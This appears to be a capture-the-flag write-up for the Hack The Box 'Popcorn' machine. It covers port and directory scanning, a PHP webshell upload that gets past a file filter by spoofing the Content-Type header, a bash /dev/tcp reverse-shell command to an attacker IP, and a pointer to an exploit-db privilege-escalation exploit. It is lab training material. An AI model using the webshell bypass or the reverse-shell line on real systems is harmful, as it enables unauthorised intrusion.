Popcorn HTB WriteUP
Popcorn - 10.129.154.134
Nmap Recon Result
Discovery OS System
TTL = 63 Linux System
Discovery Open Ports
nmap -sS --min-rate 5000 -p- --open 10.129.154.134 -n -vvv -oG initialscan
Service Enumeration
Web Services Enumeration
Whatweb
http://10.129.154.134/
Fuzzing
dirsearch -u http://10.129.154.134 -w /usr/share/dirb/wordlists/common.txt -e "php,html,txt" -F -b "404,400" -t 80 --plain-text-report=webscan
Interesting Folders
/cgi-bin/
/index
/index.html
/test
/torrent
Fuzzing /torrent/ folder
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /torrent/admin/: Possible admin folder
| /torrent/admin/admin/: Possible admin folder
| /torrent/admin/index.php: Possible admin folder
| /torrent/admin/admin.php: Possible admin folder
| /torrent/login.php: Possible admin folder
| /torrent/rss/: RSS or Atom feed
| /torrent/rss.php: RSS or Atom feed
| /torrent/login/: Login page
| /torrent/health/: Spring Boot Actuator endpoint
| /torrent/config/public/usergrp.gif: AXIS StorPoint
| /torrent/browse/: Potentially interesting folder
| /torrent/config/: Potentially interesting folder
| /torrent/css/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
| /torrent/database/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
| /torrent/download/: Potentially interesting folder
| /torrent/images/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
| /torrent/index/: Potentially interesting folder
| /torrent/js/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
| /torrent/lib/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
| /torrent/logout/: Potentially interesting folder
| /torrent/secure/: Potentially interesting folder
| /torrent/templates/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
| /torrent/upload/: Potentially interesting directory w/ listing on 'apache/2.2.12 (ubuntu)'
|_ /torrent/users/: Potentially interesting folder
http://popcorn.htb/torrent/
After visiting the site we register in the “Register” tab and notice that there is an “Upload” section where in theory we should upload a torrent file, so we will analyze this.
so we proof uploading a simple text file, but the web service does not accept it , paying more attention we note that it only accepts the following extensions
as can see the text file is invalid, we need try to bypass this filter changing the extension name, magic bytes or content type
Exploit
There are two opportunities to upload files here, the torrent and the image. I started with the image because Iโm more comfortable with how an image looks. If I submit a simple php webshell, it returns โInvalid fileโ. There is some filtering going on that Iโll need to bypass.
Iโll find the allowed upload of a PNG in Burp and send it to Repeater. There are three common ways that a website will check for valid file types by comparing them to an allow- or deny-list:
- file extension
- Content-Type header
- magic bytes
so we only change the content-type header from application/x-php to image/png to trick the server into believing that it is a file of type image, when in fact it contains a php payload
as can see in the image the server accept our file. When I check /torrent/upload, there is a PHP file there (seems to be named with a SHA1 hash of something):
And it gives execution:
** Reverse Shell **
http://popcorn.htb/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php?cmd=/bin/bash+-c+'bash -i >& /dev/tcp/10.10.14.23/443 0>&1
Priv Esc
making a google searching we found the next exploit
https://www.exploit-db.com/exploits/15704
we transfer the exploit to the target machine and compile with gcc
